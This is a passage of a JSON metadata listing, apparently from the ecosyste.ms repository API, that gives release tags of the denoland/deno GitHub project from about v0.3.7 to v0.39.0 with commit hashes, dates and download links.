v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3